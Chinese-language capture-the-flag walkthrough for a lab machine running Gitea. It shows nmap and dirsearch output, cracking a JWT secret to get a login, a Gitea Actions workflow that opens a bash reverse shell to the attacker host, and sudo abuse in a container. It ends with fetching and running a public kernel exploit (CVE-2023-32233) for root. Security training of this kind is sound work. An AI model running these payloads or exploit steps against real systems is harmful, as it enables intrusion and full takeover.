run
run
啊,crazy,是这个吗?
信息搜集
端口扫描
1
nmap -sCV -p- 10.0.2.10
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
PORT STATE SERVICE VERSION
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=e657b800ab664b37; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=hdA99ulTmbdchrsbuBdsBWUT4qg6MTcxMTI1NTY1MzY2Njk4MjI5NQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Sun, 24 Mar 2024 04:47:33 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovLzE5Mi4xNjguMS45OjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly8xOTIuMTY4LjEuOTozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXM
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=bbc8d31aced2309c; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=07xHOkM3ddUge-6XE4DkGk67QW86MTcxMTI1NTY1ODY4Nzk5ODQzNw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Sun, 24 Mar 2024 04:47:38 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=3/24%Time=65FFB063%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Contr
SF:ol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCo
SF:ntent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_git
SF:ea=e657b800ab664b37;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Coo
SF:kie:\x20_csrf=hdA99ulTmbdchrsbuBdsBWUT4qg6MTcxMTI1NTY1MzY2Njk4MjI5NQ;\x
SF:20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nDate:\x20Sun,\x2024\x20Mar\x202024\x2004:47:33\x
SF:20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"the
SF:me-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x
SF:20cup\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:
SF:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHR
SF:lYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3Rhcn
SF:RfdXJsIjoiaHR0cDovLzE5Mi4xNjguMS45OjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0d
SF:HA6Ly8xOTIuMTY4LjEuOTozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1h
SF:Z2UvcG5nIiwic2l6ZXM")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,1A4,"HTTP/1\.0\x20405\x20Me
SF:thod\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x2
SF:0GET\r\nCache-Control:\x20max-age=0,\x20private,\x20must-revalidate,\x2
SF:0no-transform\r\nSet-Cookie:\x20i_like_gitea=bbc8d31aced2309c;\x20Path=
SF:/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20_csrf=07xHOkM3ddUge-6
SF:XE4DkGk67QW86MTcxMTI1NTY1ODY4Nzk5ODQzNw;\x20Path=/;\x20Max-Age=86400;\x
SF:20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\
SF:x20Sun,\x2024\x20Mar\x202024\x2004:47:38\x20GMT\r\nContent-Length:\x200
SF:\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request");
目录扫描
1
sudo dirsearch -u http://10.0.2.10:3000 -e* -i 200,300,399 2>/dev/null
[00:53:25] 200 - 1KB - /.well-known/openid-configuration
[00:53:25] 200 - 206B - /.well-known/security.txt
[00:53:34] 200 - 16KB - /administrator
[00:53:34] 200 - 16KB - /administrator/
[00:53:36] 200 - 704B - /api/swagger
[00:53:42] 200 - 18KB - /dev
[00:53:42] 200 - 18KB - /dev/
[00:53:44] 200 - 15KB - /explore/repos
[00:54:04] 200 - 283B - /sitemap.xml
[00:54:09] 200 - 10KB - /user/login/
漏洞挖掘
访问一下:
访问敏感目录
http://10.0.2.10:3000/.well-known/security.txt
1
2
3
4
5
6
# This site is running a Gitea instance.
# Gitea related security problems could be reported to Gitea community.
# Site related security problems should be reported to this site's admin.
Contact: https://github.com/go-gitea/gitea/blob/main/SECURITY.md
Policy: https://github.com/go-gitea/gitea/blob/main/SECURITY.md
Preferred-Languages: en
http://10.0.2.10:3000/.well-known/openid-configuration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
{
"issuer": "http://192.168.1.9:3000/",
"authorization_endpoint": "http://192.168.1.9:3000/login/oauth/authorize",
"token_endpoint": "http://192.168.1.9:3000/login/oauth/access_token",
"jwks_uri": "http://192.168.1.9:3000/login/oauth/keys",
"userinfo_endpoint": "http://192.168.1.9:3000/login/oauth/userinfo",
"introspection_endpoint": "http://192.168.1.9:3000/login/oauth/introspect",
"response_types_supported": [
"code",
"id_token"
],
"id_token_signing_alg_values_supported": [
"RS256"
],
"subject_types_supported": [
"public"
],
"scopes_supported": [
"openid",
"profile",
"email",
"groups"
],
"claims_supported": [
"aud",
"exp",
"iat",
"iss",
"sub",
"name",
"preferred_username",
"profile",
"picture",
"website",
"locale",
"updated_at",
"email",
"email_verified",
"groups"
],
"code_challenge_methods_supported": [
"plain",
"S256"
],
"grant_types_supported": [
"authorization_code",
"refresh_token"
]
}
jwt爆破
找到jwt_token
,解密一下:
1
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"
发现了username
,尝试使用john
爆破一下:
1
python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o -C -d /usr/share/wordlists/rockyou.txt
dev
developer88
登录并反弹shell
有了账号密码,尝试登录:
1
2
3
4
5
6
7
git clone http://10.0.2.10:3000/dev/revershell.git
cd revershell
mkdir .gitea
cd .gitea
mkdir workflows
cd workflows
vim revershell.yaml
1
2
3
4
5
6
on: [push]
jobs:
revershell:
runs-on: run
steps:
- run: /bin/bash -i >& /dev/tcp/10.0.2.4/1234 0>&1
尝试提交更改:
1
2
3
4
5
git config user.email "dev@run.hmv"
git config user.name "dev"
git add .
git commit -m "revershell.yaml"
git push origin main
准备反弹的时候发现报错了:
1
Workflow config file is invalid. Please check your config file: yaml: line 3: found character that cannot start any token
是缩进有问题,改了一下就好了:
1
2
3
4
5
6
on: [push]
jobs:
revershell:
runs-on: run
steps:
- run: /bin/bash -i >& /dev/tcp/10.0.2.4/1234 0>&1
要先监听再启动哦。
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
act@db7db77ba113:~/cache/actions/d05059a1ad22d066/hostexecutor$ whoami
# act
act@db7db77ba113:~/cache/actions/d05059a1ad22d066/hostexecutor$ id
# id
# uid=1000(act) gid=1000(act) groups=1000(act),27(sudo),100(users),115(docker115)
act@db7db77ba113:~/cache/actions/d05059a1ad22d066/hostexecutor$ find / -perm -u=s -type f 2>/dev/null
# <hostexecutor$ find / -perm -u=s -type f 2>/dev/null
# /usr/bin/su
# /usr/bin/chfn
# /usr/bin/mount
# /usr/bin/gpasswd
# /usr/bin/newgrp
# /usr/bin/chsh
# /usr/bin/passwd
# /usr/bin/umount
# /usr/bin/sudo
# /usr/lib/openssh/ssh-keysign
act@db7db77ba113:~/cache/actions/d05059a1ad22d066/hostexecutor$ sudo -l
# sudo -l
# Matching Defaults entries for act on db7db77ba113:
# env_reset, mail_badpass,
# secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
# use_pty
# User act may run the following commands on db7db77ba113:
# (ALL : ALL) ALL
# (ALL) NOPASSWD: ALL
提权至docker root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
act@db7db77ba113:~/cache/actions/d05059a1ad22d066/hostexecutor$ sudo su
# sudo su
whoami
# root
id
# uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -la
# total 20
# drwx------ 1 root root 4096 Mar 24 04:41 .
# drwxr-xr-x 1 root root 4096 Mar 24 04:41 ..
# -rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
# -rw-r--r-- 1 root root 161 Jul 9 2019 .profile
# drwx------ 2 root root 4096 Feb 6 08:11 .ssh
# -rw-r--r-- 1 root root 0 Mar 24 04:41 .sudo_as_admin_successful
扩展shell
1
2
script /dev/null -c bash
# Script started, output log file is '/dev/null'.
切换至dev用户
1
2
3
4
5
6
7
8
9
10
root@db7db77ba113:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
12: eth0@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:12:00:04 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.18.0.4/16 brd 172.18.255.255 scope global eth0
valid_lft forever preferred_lft forever
尝试 ssh 连接一下:
1
2
3
4
su dev
# su: user dev does not exist or the user entry does not contain all the required fields
ssh dev@172.18.0.4
# ssh: connect to host 172.18.0.4 port 22: Connection refused
看来不能瞎搞,传一个fscan
扫描一下:
fscan扫描
发现两个开启了22端口,尝试进行连接:
提权至root
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
dev@run:~$ sudo -l
sudo -l
# [sudo] password for dev: developer88
# Sorry, user dev may not run sudo on run.
dev@run:~$ whoami;id
whoami;id
# dev
# uid=1000(dev) gid=1000(dev) groups=1000(dev)
dev@run:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# /usr/bin/fusermount3
# /usr/bin/su
# /usr/bin/chfn
# /usr/bin/mount
# /usr/bin/sudo
# /usr/bin/gpasswd
# /usr/bin/newgrp
# /usr/bin/chsh
# /usr/bin/passwd
# /usr/bin/umount
# /usr/libexec/polkit-agent-helper-1
# /usr/lib/openssh/ssh-keysign
# /usr/lib/dbus-1.0/dbus-daemon-launch-helper
dev@run:~$ ls -la
ls -la
# total 32
# drwxr-x--- 4 dev dev 4096 Mar 24 06:49 .
# drwxr-xr-x 3 root root 4096 Feb 5 13:10 ..
# lrwxrwxrwx 1 root root 9 Feb 5 13:40 .bash_history -> /dev/null
# -rw-r--r-- 1 dev dev 220 Jan 7 2023 .bash_logout
# -rw-r--r-- 1 dev dev 3771 Jan 7 2023 .bashrc
# drwx------ 2 dev dev 4096 Mar 24 06:49 .cache
# -rw-r--r-- 1 dev dev 807 Jan 7 2023 .profile
# drwx------ 2 dev dev 4096 Feb 5 13:10 .ssh
# -rw------- 1 dev dev 33 Feb 6 16:01 user.txt
dev@run:~$ cat user.txt
cat user.txt
# 56f98bdfaf5186243bc4cb99f0674f58
dev@run:~$ cat /etc/cron*
cat /etc/cron*
# cat: /etc/cron.d: Is a directory
# cat: /etc/cron.daily: Is a directory
# cat: /etc/cron.hourly: Is a directory
# cat: /etc/cron.monthly: Is a directory
# # /etc/crontab: system-wide crontab
# # Unlike any other crontab you don't have to run the `crontab'
# # command to install the new version when you edit this file
# # and files in /etc/cron.d. These files also have username fields,
# # that none of the other crontabs do.
# SHELL=/bin/sh
# # You can also override PATH, but by default, newer versions inherit it from the environment
# #PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# # Example of job definition:
# # .---------------- minute (0 - 59)
# # | .------------- hour (0 - 23)
# # | | .---------- day of month (1 - 31)
# # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# # | | | | |
# # * * * * * user-name command to be executed
# 17 * * * * root cd / && run-parts --report /etc/cron.hourly
# 25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
# 47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
# 52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
# cat: /etc/cron.weekly: Is a directory
dev@run:~$ cat /etc/passwd
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# bin:x:2:2:bin:/bin:/usr/sbin/nologin
# sys:x:3:3:sys:/dev:/usr/sbin/nologin
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/usr/sbin/nologin
# man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
# lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
# mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
# news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
# uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
# proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
# www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
# backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
# list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
# irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
# _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
# nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
# systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
# systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
# messagebus:x:100:106::/nonexistent:/usr/sbin/nologin
# systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
# pollinate:x:101:1::/var/cache/pollinate:/bin/false
# syslog:x:103:109::/nonexistent:/usr/sbin/nologin
# uuidd:x:104:110::/run/uuidd:/usr/sbin/nologin
# tcpdump:x:105:111::/nonexistent:/usr/sbin/nologin
# tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
# landscape:x:107:113::/var/lib/landscape:/usr/sbin/nologin
# fwupd-refresh:x:108:114:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
# dev:x:1000:1000:dev:/home/dev:/bin/bash
# lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
# dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
# sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
dev@run:~$ uname -a
uname -a
# Linux run 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
dev@run:~$ lsb_release -a
lsb_release -a
# No LSB modules are available.
# Distributor ID: Ubuntu
# Description: Ubuntu 23.04
# Release: 23.04
# Codename: lunar
此外还进行了以下探索,就不粘贴上去了:
1
2
3
4
5
cat /etc/profile
ps aux
ps aux | grep root
ls -alh /usr/bin/
cat /etc/resolv.conf
但是均无果,看了被人思路发现是个内核提权。。。。。。
内核提权
1
2
3
4
5
6
# kali
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233
sudo apt install gcc libmnl-dev libnftnl-dev
gcc -Wall -o exploit exploit.c -lmnl -lnftnl
python3 -m http.server 8888
1
2
3
4
5
# dev
cd /tmp
wget http://10.0.2.4:8888/exploit
chmod +x exploit
./exploit
我这边重启了一下靶机,重新来了一次:
获得了rootshell!!!
寻找flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# whoami;id
whoami;id
# root
# uid=0(root) gid=0(root) groups=0(root),1000(dev)
cd /root
cd /root
ls
# ls
# 1 root.txt script.sh
cat script.sh
# cat script.sh
# cd /opt/gitea && docker-compose down
# cd /opt/gitea && docker-compose up -d
# systemctl enable --now ssh.service
cat root.txt
# cat root.txt
# 008b138f906537f51a5a5c2c69c4b8a2
本文由作者按照 CC BY 4.0 进行授权